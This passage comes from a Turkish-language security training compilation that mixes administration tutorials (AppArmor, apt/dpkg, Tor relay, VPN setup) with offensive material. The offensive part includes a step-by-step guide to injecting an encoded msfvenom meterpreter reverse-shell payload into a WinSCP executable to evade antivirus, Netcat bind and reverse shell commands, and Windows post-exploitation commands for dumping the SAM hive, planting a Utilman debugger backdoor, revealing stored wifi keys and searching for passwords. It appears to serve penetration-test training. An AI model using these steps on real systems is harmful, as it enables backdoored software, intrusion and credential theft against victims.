Linux a sahip olmamız gerekiyor. Kali Linux un yükleme iso dosyasını ilgili adresten indirmek için tıklayınız. Kali yi açtıktan sonra: terminal i açıyoruz ve proxychains yazıyoruz. Proxychains i kullanabilmemiz ve ip adresimizi gizleyebilmemiz

39 için proxy listeslerine ihtiyacımız vardır, Bunlar : Hide My Ass SamAir Security Proxy4Free Hide.me Biz SamAir Security i kullanacağız: Proxy listesi aşağıdaki gibidir: Ülkelere göre Proxylerden Rusya yı seçeceğiz: Rusya da yüksek gizliliğe aşağıdaki gibidir: sahip http sunucular nano /etc/proxychains.conf komutuyla proxychains konfigürasyonu yapılır ve kaydedilip çıkılır.başka bir text editörüyle de yapabilirdiniz.ben nano yu kullandım.

40 Daha sonra terminalden proxychains iceweasel yazarak anonim olarak gezintiye çıkabiliriz Not: İnternete çıkamazsanız farklı ülkelere ait yüksek gizliliğe sahip başka proxy sunucular seçebilir ve onları proxychains.conf dosyasına ekleyebilirsiniz. Ubuntu Security Framework Yapısı AppArmor Bu uygulama Ubuntu için geliştirilmiş olan bir Security Framework yapısıdır. Red Hat ve Fedora sistemlerdeki SELİNUX benzer bir yapısı bulunmaktadır.sistemin arkaplanında her daim çalışmaya devam eder ve siz ne olduğunu genelde fark etmezsiniz. AppArmor açıklanabilecek en kısa açıklaması ile sisteme verilebilecek zararı sınırlandırır veya yapılan bu işlemi tamamen durduran bir uygulamadır.selinux ve AppArmor ikiside MAC(Mandatory Access Control) güvenliğini sağlamaktadır.yapılacakları veya yapılmayacakları belirler. AppArmor sunucu sistemleri için özellikle kullanılması ve özel kural setlerinin belirlenmesi istenilen bir yapıdır.internetde ufak bir araştırma yaparak görebileceğiniz gibi bazı işlemleri

41 kısıtladığı için kapatılması önerilir şeklinde yazılır.aksine AppArmor Ubuntu sistemlerde hayati önem taşıdığı için kesinlikle kapatılmaması gerekmektedir.çok nadir durumlar dışında lütfen kapatmayınız.cevap alınamayan bir uygulamanın yeniden başlatılması sürecinde bile etkin bir şekilde rol almaktadır. AppArmor sistemde öntanımlı olarak çalışır bir halde gelir ve durumunu öğrenmek isterseniz aşağıdaki komutu vermeniz gerekir.sistemde kullandığınız uygulamalara göre kural setleri ve profiller farklılık gösterir. apparmor_status

42 Burada görebileceğiniz gibi farklı profil paketleride gözüküyor çünkü ben sistemi yapılandırırken AppArmor için profil paketini sisteme dahil ettim böylelikle bir çok programı koruma altına almış oldum.profilleri kurmazsanız Ubuntu sisteminde ilk kurulumda gelen uygulamalar dışında korumaya almadığını görebilirsiniz. sudo apt-get install apparmor-profiles Yukarıdaki komut ile sisteme profil paketini dahil edebilirsiniz.bu aşamadan sonra ise profiller otomatik çalışmaya süreçleri kontrol etmeye başlar.bunun dışında AppArmor yapısında 2 adet mod vardır bunlardan biri Enforce diğeride Complain modlarıdır. İstediğiniz uygulamayı bu modlardan biri ile koruma altına alabilirsiniz.koruma altına alınacak olan uygulamanın sistem içerisindeki yolunu bilmeniz yeterli Uygulamayı Enforce moduna taşımak için: sudo aa-enforce /uygulamayolu Uygulamayı Complain moduna taşımak için: sudo aa-complain /uygulamayolu Yaratılan bu uygulama profilleri /etc/apparmor.d/ klasörü içerisinde bulunmaktadır oluşturduğunuz herhangi bir profili buradan rahatlıkla görebilir ve manuel olarak müdahalede bulunabilirsiniz.

43 Aynı zamanda tüm profillerin modlarını tek bir komut ile Enforce yada Complain moduna alabilirsiniz. sudo aa-complain /etc/apparmor.d/* sudo aa-enforce /etc/apparmor.d/* Bununla birlikte mysqld için otomatik olarak yazılmış olan bir kural setini şu şekilde görüyoruz.

44 Bu dosya içerisinde ise komutlar şu şekilde açıklanabilir. #include <tunables/global> Satırı ortak olarak tanımlanan kural seti havuzundaki parametreleri dosya içerisine çağırmaktadır.ön tanımlı olarak gelen ayarlar dahil edilir. Alt satırda yer alan ve uygulamanın yolunu gösteren kısımda normalde uygulamada uygulanacak olan mod

45 belirtilir ancak bilgisayarımda kullandığım bir takım geliştirme ortamlarını enforce etmediğim için kural seti normal olarak çalışıyor yani mysqld süreçlerinde herhangi bir kısıtlama getirmedik.getirmiş olsaydık> /usr/sbin/mysql flags=(enforce) olarak geçecekti. /etc/hosts.allow ve hemen altındaki satırda ise uygulamaya okuma konusunda ayrıcalıklar tanır ve belirtilen yerdeki dosyayı okuyarak dosya içine ekleme yapar. Ayar dosyası içerisinde bulunan r,ux,rw,m gibi parametreler ise şu şekilde tanımlanmıştır. r okuma w yazma ux Kısıtlamasız çalıştırma Ux Temiz kısıtlamasız çalıştırma px Ayrı ayrı profilleri yürüt Px Temiz ve ayrık bir şekilde profilleri yürüt ix Devralarak yürüt m PROT_EXEC işlemi kabul edilir. l link AppArmor size hiçbir şekilde bilgilendirme yapmaz arka planda sessizce çalıştığı için acaba işe yarıyor mu gibi düşüncelere kapılabilirsiniz.bunun yerine sisteminize apparmor-notify ve apparmor-utils paketlerini kurarsanız ve uygulamaları admin kullanıcısına eklerseniz apparmor tarafından gelen bildirimleri görme imkanınız var ancak her süreçte bunu görmek canınızı sıkacağı için kapalı kalması önerilir. Kritik bir durumla karşılaşırsanız ve AppArmor uygulamasını durdurmak istiyorsanız aşağıdaki komutu kullanabilirsiniz. /etc/init.d/apparmor stop veya sudo service apparmor stop

46 Aynı şekilde AppArmor uygulamasının çalışmasını ama profillerin eski haline gelmesini ve durmasını istiyorsanız aşağıdaki komutu kullanabilirsiniz. /etc/init.d/apparmor teardown Anti-Virus Atlatma 4 Bir önceki yazıda Shellter aracının içerisindeki payloadları kullanarak, çalıştırılabilir dosya formatında ki bir dosyaya arka kapı yerleştirmiştik. Oluşturulan bu zararlı yazılımın Virustotal sitesindeki taramasından elde edilen sonuç 1/56 idi. Bu yazıda yine Shellter aracını kullanacağız fakat bu sefer gömülü gelen payloadlar yerine, Metasploit Framework ün içerisinde bulunan Msfvenom ile üreteceğimiz ve bize meterpreter ile reverse bir TCP bağlantı veren payload kullanacağız. Msfvenom Öncelikle Msfvenom kullanarak bir payload üreteceğiz. Msfvenom, Metasploit Framework ün içerisinde bulunan Msfpayload ve Msfencode araçlarının birleşimidir. Üstünde iyileştirmeler ve optimizasyon yapılmıştır, önceki araçlara göre hızlı bir şekilde payload/shellcode üretmektedir. Artık Metasploit içerisinde msfpayload ve msfencode araçları kullanılmamaktadır. Default olarak Msfvenom gelmektedir. Basit bir şekilde, x86/shikata_ga_nai ile 10 iterasyonla encode edilmiş bir payload kullanacağız. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5656 -a x86 -e

47 x86/shikata_ga_nai -i 10 -f raw -o Backdoor.raw Shellter Daha öncede bahsettiğimiz gibi Auto ve Manual olmak üzere iki mod bulunmaktadır. Manual modda çok fazla interaktif işlem olduğu için, kimi zaman kötü bir çıktı alınabilir. Hız, kolaylık ve bypass kabiliyetinin yüksekliği nedeniyle Auto mod (A) tercih edilir. Mod tercihinden sonra arka kapıyı enjekte edeceğimiz zararlı yazılımın dosya yolunu girmemiz gerekmektedir. Örnek olarak SFTP yazılımı olan portable WinSCP indirilip, kullanılmıştır. Custom Payload Gelen ekranda iki seçenek sunuluyor. İlki, bir önceki yazıda anlattığımız, Shellter içerisinde gömülü olarak gelen payloadlardan birini kullanarak zararlıyı oluşturma. İkincisi,

48 elimizde olan bir payloadı çalıştırılabilir dosyaya enjekte etme seçeneği. Custom manasındaki C yi girdikten sonra, Msfvenom ile ürettiğimiz payloadın yolunu göstererek yola devam ediyoruz. Shellter v4 ile birlikte Reflective DLL destekler şekilde gelişmiştir. Reflective DLL seçeneği ile seçilecek olan bir DLL processin çalışması sırasında kullanılabilir. Kullanılacak DLL disk üzerinde herhangi bir işlem yapmayan, üzerinde çalıştığı processin adres uzayında çalışacaktır. N diyip geçiyoruz. Payload hakkında kısa bir bilgi gösterdikten sonra, vermiş olduğumuz payloadı, çalıştırılabilir dosyaya enjeksiyon işlemi başlamış oluyor. Enjeksiyon işlemi tamamlandı. Bu aşamadan sonra çalıştırılabilir dosyamıza oluşturduğumuz arka kapı yerleştirilmiştir.

49 Tarama Sonucu Oluşturduğumuz zararlı yazılımın, VirusTotal sayfasında yapılan online tarama sonucu aşağıdaki resimde verilmiştir. Görüldüğü üzere kendi oluşturduğumuz payloadı kullanmak, Shellter içerisinde gömülü gelen payloadları kullanmaktan daha iyi sonuç verdi. Şimdi ise oluşturulan zararlıyı, kurban makinesinde çalıştıralım ve Metasploit e gelecek bağlantıyı görelim. Reverse Bağlantı Oluşturduğumuz zararlı yazılım öncelikle Metasploit tarafında dinlemeye almamız gerekiyor, gelen bağlantıları yakalamak için. Bunu yapmak için multi/handler modülünü kullanarak gerekli opsiyonları düzenleyip dinlemeyi başlatmamız gerek. Bunun için oluşturduğumuz payloada göre girilecek komutlar aşağıdaki gibidir. use exploit/multi/handler

50 set payload windows/meterpreter/reverse_tcp set lhost set lport 5656 set exitonsession false exploit -j -z Oluşturulan zararlı yazılımın kurban bilgisayarında çalıştırılması sonucunda, dinlemeye aldığımız handler a session düşecektir. Var olan sessiona geçiş yapıp, meterpreter shell imizi kullanabiliriz.

51 Netcat Kullanımı Bu doküman, Netcat in hem Linux hem de UNIX sistemlerdeki çeşitli kullanım şekillerinden bahsetmektedir. Temel Kullanım : Basit Netcat Istemci #nc [Hedef IP] [Port] Vermiş olduğunuz hedef IP nin yine vermiş olduğunuz porta bağlantı kurar. Basit Netcat Dinleyici #nc l p [localport] Yerelde verdiğiniz portta Netcat dinleyici kurar. Netcat Komutları #nc [options] [Hedef IP Adresi] [port/lar] [Hedef IP Adresi] kısmı basit olarak karşı tarafın IP adresi ya da domain adıdır. -l : Listen mod ( dinleme modu ) (varsayılan olarak istemci moddadır) -L : Listen harder (yalnızca Netcat in Windows versiyonu için desteklidir. Bir istemci bağlantısı koptuktan sonra tekrar dinlemeyi otomatik başlatmak amacıyla Netcat e kalıcı bağlantı sağlar.) -u : UDP mod (varsayılan TCP) -p : Yerel port (Dinleme modunda bu port dinlenir, istemci modda ise bütün paketlerin gönderildiği kaynak porttur.) -e : Kurulan bağlantıdan sonra program çalıştırmaya

52 yarar. n : DNS sorgusu yapmaması için kullanılır. -z : Zero I/O mod (Hiçbir very göndermez) -wn :Bağlantı timeout, STDIN kapandıktan sonra N saniye bekler.bir Netcat istemci veya dinleyici bu komut ile bağlantı kurması için N sn bekler. Eğer bu süre zarfında bağlantı gerçekleşmezse Netcat çalışmayı durdurur. -v :Ayrıntılı modu. Meydana gelen Standart Error hatayı ekrana yazdırır. -vv :Daha Ayrıntılı modu. Standart Error hakkında daha fazla ayrıntı yazdırır. Netcat Windows Kullanımı : İstemci den Dinleyici ye Aktarım C: \> echo nc [Hedef IP] [Hedef Port] > deneme.bat C: \> nc l p [YerelPort] e deneme.bat YerelPort dan Hedef IP nin Hedef Portuna kurulan bağlantı ile paketler gönderilir. Dinleyici-Dinleyici Aktarım C: \> echo nc l p [YerelPort2] > deneme.bat C: \> nc l p [YerelPort1] e deneme.bat YerelPort1 de kurulan bir bağlantı ile YerelPort2 ye paket gönderimi şeklinde bir aktarım oluşturulur. İstemci-İstemci Aktarım C: \> echo nc [Sonraki IP] [Port 2] > deneme.bat C: \> nc [Önceki IP] [Port 1] -e deneme.bat

53 Önceki IP nin Port 1 inden Sonraki IP nin Port 2 sine paket gönderimi ile aktarım olur. Dosya Transferi İstemciden Dinleyiciye Dosya Gönderme #nc l p [Yerel Port] > [giden dosya] Yerel Port dinlenir ve giden dosya çıktısı yüklenir. #nc w3 [Hedef IP] [Hedef Port] < [gelen dosya] gelen dosya Hedef IP nin Hedep portuna push edilir. Dinleyici den İstemci ye Dosya Çekmek #nc l p [Yerel Port] < [gelen dosya] Yerel Port dinlenir ve gelen dosya push etmeye hazırlanır. #nc w3 [Hedef IP] [Hedef Port] > [giden dosya] Hedef IP nin Hedef Portu ile bağlantı kurulur ve giden dosya çekilir. TCP Port Tarayıcı IP Adresin Port Taraması #nc v n z w1 [Hedef IP] [Başlangıç portu]-[bitiş portu] Belirtilen port aralığında hedef IP ye n (isimleri çözmeden) z (herhangi bir data göndermeden) w1 Bağlantı kurmak için 1 sn den daha fazla beklemeden port taraması gerçekleştirme işlemine başlar. TCP Banner Grabber Linux IP adresine üzerinde çalışan TCP servislere Banner Grabbing #echo nc v n w1 [Hedef IP] [baş. port]- [bitiş Port]

54 Backdoor Shell Linux da backdoor shell dinleme #nc l -p [Yerel Port] e /bin/bash Windows da backdoor shell dinleme C: \> nc l p [Yerel Port] e cmd.exe Tersine backdoor shell dinleme (Linux) # nc [Senin IP adresin] [port] e /bin/bash Tersine backdoor shell dinleme (Windows) C: \> nc [Senin IP adresin] [port] e cmd.exe Debian Temelli Paket Yönetimi Sistemlerde Düzenlemiş olduğumuz eğitimlerde bolca karşımıza çıkan bir sorundur paket yönetimi.katılımcılar çalıştıkları kurumlarda kullandıkları distro doğrultusunda paket kurmayı denemekte ancak malesef Debian sunucular üzerinde yum, Red Hat sunucular üzerinde ise apt-get denediklerine acı içinde şahit oluyorum. Yazı 2 parçadan oluşuyor.bu girdi yazının ilk bölümü olan debian temelli sistemlerde paket yönetimini anlatıyor olacak.bu yazıda apt ve dpkg komutlarını inceleyeceğiz.ikinci yazıda ise Rhel temelli sunucular için paket yönetimine değineceğim.ikinci yazıda yum, rpm gibi konulara değineceğiz.daha fazla uzatmadan başlayalım yazımıza Debian bazlı işletim sistemleri ( Ubuntu,Mint,Debian ın

55 kendisi ) paket yöneticisi olarak apt (Advanced Packaging Tool) ve dpkg kullanır. Bu komutların kullanımına geçmeden önce linux paket yönetiminde son derece önemli olan repo mantığına değinmek istiyorum. Repolar paketlerin bulundugu internet dizin adresleridir ve bizim distrolarımızda /etc/apt/sources.list yolunda saklanır. Örneğin benim lokal sunucum için bu dosya şu şekildedir > deb testing main contrib nonfree deb jessie-updates main contrib non-free deb jessie/updates main contrib non-free Ayrıca apt ile komut satırından yaptığımız tüm işleri yapabileceğimiz synaptic adında başarılı bir uygulama mevcuttur.ancak ubuntu ve mint kullanıcıları eğer terminale hakim değiller ise genellikle synaptici değil kurulu olarak gelen Ubuntu Software Center kullanmaktalar.yazının devamında kurmak istediğim uygulama olarak geany kullanıyor olacağım.siz aşağıdaki komutlarda geany görüdüğünüz yere kurmak istediğiniz paket adını eklemelisiniz. A.Paket Arama apt-cache search geany Komutları ile kurmak istediğimiz paketin depolarımızda olup olmadığını kontrol edebiliriz. B.Paket Kurma Kurmak istediğimiz program repoda var ise kurmaya hazırız. sudo apt-get install geany

56 komutu ile programımızı kurabiliriz. C.Paket Silme Linuxta paket silmenin iki farklı çeşiti vardır.biri yapılandırma dosyalarını saklayarak dosya siler,diğeri ise yapılandırma dosyaları ile birlikte siler. Yapılandırma dosyalarını saklayarak silmek için; sudo apt-get remove geany yapılandırma dosyaları ile birlikte silmek için sudo apt-get purge geany veya sudo apt-get remove purge geany komutlarını kullanırız. D.Paket Güncelleme Güncelleme işlemi sudo apt-get update komutu ile yapılır.ancak bu komut programı güncellemez.repolarımızı günceller ve kurulum yapacağımız sırada programların en güncel halini bizim için hazırlar.tam anlamı ile bir güncelleme sudo apt-get upgrade komutu ile mümkündür. E.Sistem Güncelleme Windows kullanıcı olduğum dönemde çokça istediğim birşey idi dosyalarımı kaybetmeden yeni sisteme geçmek.yani XP kullanırken Windows 7 kurmak ve bu sırada dosya ve ayarlarımın

57 bozulmasının önüne geçmek.windows dünyasını takip etmeyi bırakalı oldukça fazla oldu ama sanırım Windows10 a geçiş bir tıkla yapılıyormus.şanslı olan insanlar da dosyalarını kaybetmiyormus :)) Peki bu işlemi tek bir komut ile yapabiliriz desem? sudo apt-get dist-upgrade Komutu ile debian 7.9 olan sunumucu az önce 8.2 ye sorunsuz güncelledim. Evet apt ile bu bilgiler hemen her işinizi çözebilir ancak man page okumayı asla ihmal etmeyin.hiç kullanmadığınız ancak inanılmaz iş çözücü parametre bulacağınızdan emin olabilirsiniz. Şimdi geldik DPKG ye. Dpkg red hat de ki rpm paketlerinin debiandaki karşılığıdır.ya da windows için exe ne ise debian için.deb paketi odur.ayrıca.deb paketlerine gözü kapalı güvenmemeliyiz.3. parti bir kaynaktan alınan bir.exe paketi kadar tehlikelidir.dolayısı ile kurmak istediğimiz program önce official repo da varmı kontrol etmemizde fayda var. 1.Paketleri Listeleme Sistemimizde kurulu olan paketleri listemek için dpkg -l komutunu kullanırız.dpkg -S parametresi ile de dosyanın hangi paket tarafından kuruldugunu görebiliriz. 2.Paket Kurma Diyelim ki elinizde.deb uzantılı bir paket var.bu pakedi kurmak için:

58 dpkg -i /deb/dosyasının/yolu/ komutu yeterli olacaktır. Ayrıca debian paketlerine(.deb) çift tıkladığınız takdirde sizi görsel paket yöneticinize yönlendirecektir.dilerseniz program kurmayı kolay hale getiren gdebi paketini sudo apt-get install gdebi-core komutu ile kurabilirsiniz.daha sonra kurmak istediginiz.deb paketlerini sudo gdebi /deb/paketi/yolu seklinde calıstırarak kurabilirsiniz. 3.Paket Silme Sistemimize kurulu bir paketi silmek için dpkg -r google-chrome-stable Komutu yeterli olacaktır.yukarıdaki komut google-chrome-stable komutunu sistemimizden kaldıracaktır.ancak Chrome a ait yapılandırma dosyalarını saklayacaktır. Not: Ne apt, ne de dpkg burada yazılanlardan ibaret değil.aksine burada yazdıklarım buzdağının sadece görünen kısmı man dpkg ve man apt komutları ile manual sayfalarına girerseniz burada okuduklarınızdan çok daha fazla ayrıntılı bilgi bulabilirsiniz.yada dpkg man page için buraya apt man page için buraya tıklayabilirsiniz. Tor Ağında Relay Olmak için Yapılması Gerekenler Tor, The Onion Routing kullanıcıların internet üzerindeki faliyetlerini anonimleştirmek için geliştirilmiş bir yazılım projesidir.kendi nodeleri üzerinden kullanıcıların gerçek

59 kimliklerini gizleyip şifreler, işte biz bu yapıya dahil olacağız. Bu yazımda sizlere bu ağ içerisinde relay olma imkanı sunacağız yani aracı olacaksınız.trafik sizin bağlantınız üzerindende geçecek, böylelikle Tor a bir katkıda sizler sağlamış olacaksınız.korkmayın Tor üzerinde yapılanlardan siz sorumlu olmazsınız sonuç itibariyle aracısınız bağlantı sadece üzerinizden direk olarak geçecek, sonrasında Exit Relay aracılığıyla son bulacak, biz ise sadece Relay olacağız yani sadece aradaki bir unsur olacağız. Öncelikli olarak yapmanız gereken sisteminize ntp kurmak sistem saatinizin güncel olması ve senkronize olması önemli.bunun için: sudo apt-get install ntp Komutunu vermek daha sonra ise sunucuları tanımlamak, bunun için Türkiye sunucularını seçilebilir, fark etmiyor yeterki uyumlu olsun. sudo nano /etc/ntp.conf İçerisine ise şu güncelleyeceksiniz. server server server server satırları ekleyip sunucuları 0.tr.pool.ntp.org 1.tr.pool.ntp.org 2.tr.pool.ntp.org 3.tr.pool.ntp.org Evet saatte rayına girdiğine göre asıl işlemlere başlayalım.tor un sisteminizde kurulu olması gerekiyor.kurulu değilse aşağıdaki komut ile kurabilirsiniz > sudo apt-get install tor Tor paketi yanında birkaç ek paket daha kurulacaktır.bu kurulumdan sonra ise relay aşaması için yapılandırma yapmamız gerekiyor.yapılandırma yapılmamış ise kullanmış olmuyorsunuz.

60 sudo nano /etc/tor/torrc Dosya içerisi ön tanımlı olarak bir takım parametreler ile doldurulmuş ancak çalışır durumda değil çalışır hale getirmek için aşağıdaki gibi düzenleme yapmanız gerekiyor. RunAsDaemon 1 ORPort 9001 DirPort 9030 ExitPolicy reject *:* Nickname ox2e88ce4 RelayBandwidthRate 1 MB RelayBandwidthBurst 2 MB AccountingStart month 1 00:00 AccountingMax 100 GB DisableDebuggerAttachment 0 Yukarıdaki parametreleri ise şu şekilde tanımlayabiliriz. RunAsDeamon Sistemde servislerini tanımlar. ORPort Tor un çıkış portu diğer istemciler ile iletişimini sağlar DirPort -Tor dizinini duyurabileceğiniz bağlantı

61 noktasıdır.trafiğiniz sınırsız veya yeterli ise kullanmanız önerilir ExitPolicy Çıkış unsuru olup olmayacağınızı bu komutlar ile belirleyebilirsiniz biz reject *:* diyerek sadece relay yani ara unsur olmayı seçtik Nickname Sistemde kullanabileceğiniz bir takma isim RelayBandwidthRate Tor un kullanabileceği ağ hızını tanımlar. RelayBandwidthBurst Tor un kullanabileceği maximum ağ hızını tanımlar. AccountingStart Hesabınızın trafik sayacının saat kaçta başlamasını istiyorsanız bunu girebilirsiniz.aylık, haftalık veya günlük olarak tanımlama yapabilirsiniz. AccountingMax -Tor un sisteminizde kullanabileceği maximum toplam trafiği belirtir. DisableDebuggerAttachment Hata ayıklama modunu kapatır. Belirtmiş olduğum parametreler Relay olabilmeniz için olmazsa olmaz diyebileceğimiz parametrelerdir.eğer herhangi bir sunucunuz varsa ve bunu Exit Relay(Çıkış unsuru) yapmak istiyorsanız daha farklı bir yol izlemeniz gerekiyor. Exit Relay olurken dikkat etmeniz gerekiyor zira tüm trafik sizde sonlanacak yani adam herhangi bir illegal iş gerçekleştirirse son olarak sizin ip adresiniz gözükecek bu noktada sunucunuza kurarken yapılandırmanızı ona göre ve iyi bir şekilde yapmanız gerekiyor.ayarlamalarınız bittiyse Tor sürecini yeniden başlatmanız gerekecek ki yeni tanımladığınız ayarlar geçerli olsun. sudo service tor restart Çalışıp çalışmadığını yada işlemin nasıl ilerlediğini sistemdeki log kayıtlarına bakarak anlayabilirsiniz.aşağıdaki gibi bir çıktı vermiş ise doğru yoldasınız demektir.

62 Buraya kadar sorunsuz bir şekilde geldiyseniz artık tor ağı üzerinde bir relay olarak gözüküyorsunuz ve tarafınıza uniq bir kimlik tanımlayıcı verilmiş demektir.bunu yönetmek ve görüntülemek istiyorsanız aşağıdaki paketi kurmanız yeterlidir. sudo apt-get install tor-arm Kurulumu yaptıktan sonra ise aşmanız gereken bir sorun bulunuyor. tor-arm belirli bir kullanıcı tarafından kullanılmak zorunda, bu da kendi içerisinde tanımlı olarak gelen debian-tor kullanıcısı yani izleme işlemi yaparken direk olarak arm diyip açmanız bir işe yaramaz istatistikleri doğru bir şekilde alamazsınız.doğru olan komut ise şu şekilde; sudo -u debian-tor arm Komutumuzu verdik ve artık ne kadar trafik harcadığını görebilir, ayarlamaları buradan yapabilirsiniz.

63 Cyberoam Firewall ve Android Üzerinde Open SSL VPN Yapılandırması SSL Vpn dış networkten yani kurum dışında herhangi bir noktadan internet üzerinden kurum networküne erişim sağlamak için yapılan bir uygulamadır. Bu makalede Android işletim sistemini kullanan cep telefonları üzerinden open source bir yazılım olan OPEN VPN uygulamasını kullanarak kurum networküne erişim yapmak için Cyberoam üzerinden yapılması gereken işlemler anlatılacaktır. Cyberoam güvenlik duvarı üzerinde Open SSL Vpn bağlantısı

64 oluşturmak için öncelikle bir kullanıcı oluşturulur. IDENTY > Users > Add adımları takip edilerek kullanıcı tanımlanır. Cyberoam un public ip sini SSL Vpn portu belirtilerek kullanıcı ekranı gelmesi sağlanır. Kulla nıcı ekranında ilk adımda tanımlanan kullanıcı bilgileri girilerek, SSL VPN User Portal ı karşımıza çıkacaktır. Bu portal da Android Open SSL Vpn için bir konfigürasyon dosyası oluşmuştur. Client Configuration for Mac Tunnelblick IPV4 dosyası tıklanarak bilgisayara indirilir.

65 Sonrasında dosya rar dan çıkartılarak normal dosya şeklinde Android bir telefona yüklenir.

66 Android telefonlarda Google Play uygulaması üzerinden OpenVPN programı indirilerek kurulum gerçekleştirilir. Ve aşağıdaki adımlar takip edilir.

67 Tüm bu işlemlerden sonra OpenVPN ile bir Android telefonda nasıl bağlantı kurulduğunu ve de bağlantıdan sonra da Cyberoam loglardan nasıl görüldüğü belirtilmiş oldu. Etki Alanı Sızma Testleri

68 İçin Windows İşlemleri Komut Satırı Sızma testleri sırasında ele geçirilen bir Windows işletim sisteminde komut satırı ile bazı işlemlerin yapılması gerekebilmektedir. Bu yazıda, sızma testlerinde Windows işletim sistemi üzerinde çalıştırılabilecek temel komutlar çeşitli başlıklar altında incelenecektir. Kullanıcı ve Grup İşlemleri > Yerel bilgisayarda kullanıcı işlemleri whoami echo %username% echo %computername%%username% whoami /all net user net user Ali net user Ali /Active:Yes net user Ali Aa net user Ali /del net user Burak Bb /add Yerel bilgisayarda grup işlemleri net net net net net net localgroup localgroup localgroup localgroup localgroup localgroup Remote Desktop Users Sistem Yoneticileri /add Sistem Yoneticileri /del Administrators Burak /add Users Burak /del Etki alanındaki kullanıcı işlemleri

69 net net net net net net user user user user user user /domain Cihan.Ozgullu /domain Cihan.Ozgullu /Active:Yes /domain Cihan.Ozgullu Cc /domain Cihan.Ozgullu /del /domain Deniz.Kirmizili Dd /add /domain Etki alanındaki grup işlemleri net group /domain dsquery group -limit 0 dsget group -members expand net group Domain Computers /domain net group Yardim Masasi /add /domain net group Yardim Masasi /del /domain net group Domain Admins Cihan.Ozgullu /add /domain net group Domain Users Deniz.Kirmizili /del /domain for /f delims= %X in (DomainAdminsGrubuUyeleri_Listesi.txt) do net user %X /domain >> DomainAdminsGrubuUyelerininIlkeBilgileri.txt Not: Girdi dosyasında (DomainAdminsGrubuUyeleri_Listesi.txt), kullanıcı isimleri alt alta yazılıdır. Bilgisayar İşlemleri > Mevcut sistem bilgileri systeminfo ver echo %LOGONSERVER% systeminfo findstr Domain: fsutil fsinfo drives net view net config WORKSTATION getmac

70 Başlangıç dizinleri Windows 6.0 ve 6.1 Tüm kullanıcılar için: %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup Belirli kullanıcılar için: %SystemDrive%\Users\%UserName%\AppData\Roaming\Mic rosoft\windows\start Menu\Programs\Startup Windows NT 5.0, 5.1 ve 5.2 %SystemDrive%\Documents and Settings\ All Users\ Start Menu\Programs\Startup Hesap politikası işlemleri net accounts net accounts /MAXPWAGE:3 Denetim politikası işlemleri auditpol /get /category:* auditpol /set /subcategory: IPsec /success:enable /failure:disable Driver Paylaşım işlemleri net share net share /GRANT:Everyone,Full Oturum bilgileri YeniPaylasim=C:UsersDeneme

71 query session qwinsta psloggedon -l Ertan Get-WmiObject -Class Win32_NetworkLoginProfile SortObject -Property LastLogon -Descending Select-Object Property * -First 1 Where-Object {$_.LastLogon -match (d{14}) } Foreach-Object { New-Object PSObject Name=$_.Name;LastLogon=[datetime]::ParseExact($matches[0 ], yyyymmddhhmmss, $null)}} Proses işlemleri tasklist /v tasklist /SVC findstr /I explorer.exe tasklist /fi pid eq 460 wmic process where (executablepath like %system32% and name!= svchost.exe or Priority = 8 ) get HandleCount, Name, ParentProcessId, Priority, ProcessId, ThreadCount /Every:3 > CalisanProseslerinDetaylari.txt taskkill /F /T /IM filezillaftp.exe taskkill /PID 1862 /F qprocess explorer.exe qprocess akif.cihangir wmic process call create calc wmic process where name= calc.exe call terminate Kayıt değeri işlemleri reg query HKLM\System\CurrentControlSet\Control\Lsa /v crashonauditfail reg query HKCU\Software\SimonTatham\PuTTY\Sessions\PuttyUzerindeK ayitlioturumadi /v Hostname reg add

72 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Ter minal Server /v fdenytsconnections /t REG_DWORD /d 1 /f reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d /f reg save HKLM\SAM C:\SAMDosyasi reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe /v Debugger /t REG_SZ /d C:\Windows\System32\cmd.exe /f reg export HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Ter minal Server Sonuc.reg reg import Sonuc.reg Ağ hareketleri netstat -ano netstat -ano -p TCP findstr 3389 findstr /v :3389 netstat -abf Yönlendirme işlemleri netstat -r route print -4 route add MASK route del Kablosuz ağ işlemleri netsh wlan show profiles netsh wlan show profile name=modemssid netsh wlan show profile name=modemssid key=clear

73 findstr Key Content Dosya dizini: C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\XXX Ağ işlemleri ipconfig /all arp -a nslookup tftp -I GET Uygulama.exe netsh interface ipv4 set address name= Local Area Connection source=static address= mask= gateway= netsh interface ipv4 add dnsservers Local Area Connection netsh interface portproxy add v4tov4 listenport=3000 listenaddress= connectport=4000 connectaddress= type C:\Windows\System32\Drivers\etc\hosts DNS bilgileri ipconfig /displaydns ipconfig /flushdns Dosya ve klasör işlemleri dir /a C:\Users\Mehmet\Downloads\*.pdf tree /f /a dir /s /b findstr /si parola sifre password root admin icalcs C:\Users\Ahmet\Desktop\KritikKlasor > icalcs: Sysinternals aracı forfiles /P d: /D -30 /S /M *.exe /C cmd /c

74 @ext Get-ChildItem -Path C:\Users, C:\Araclar -Include *.txt, *.log, *.bat, *.reg, *.cs, *.sql, *.ps1, *.config, *.properties, *.xml, *.conf -Recurse -ErrorAction SilentlyContinue -Force Select-String -Pattern Password, password, Şifre, şifre, Parola, parola, Sifre, sifre, root, admin -casesensitive > C:\KritikBilgiler.txt Zamanlanmış görevler schtasks /query /fo LIST /v findstr Folder: HostName: Author: Run: TaskName: Comment: schtasks /Create /SC Daily /TN GunlukKullaniciListesi /TR C:\Windows\System32\net.exe user at /interactive 15:00 cmd.exe net time Servis işlemleri sc query state= all sc queryex (PID değeri de içerir) sc qc TermService accesschk -cqwvu TrustedInstaller > accesschk: Sysinternals aracı wmic service get name, displayname, started, state, AcceptPause, AcceptStop findstr /C:Term net stop PolicyAgent net start termservice start= auto sc config PlugPlay start= disabled sc create ServisAdi binpath=c:\users\uygulamadosyasi.exe start= auto Not: Power, PlugPlay gibi kapatılamayan servisler devre dış bırakılıp, makine yeniden başlatılırsa bu servis çalışmaz.

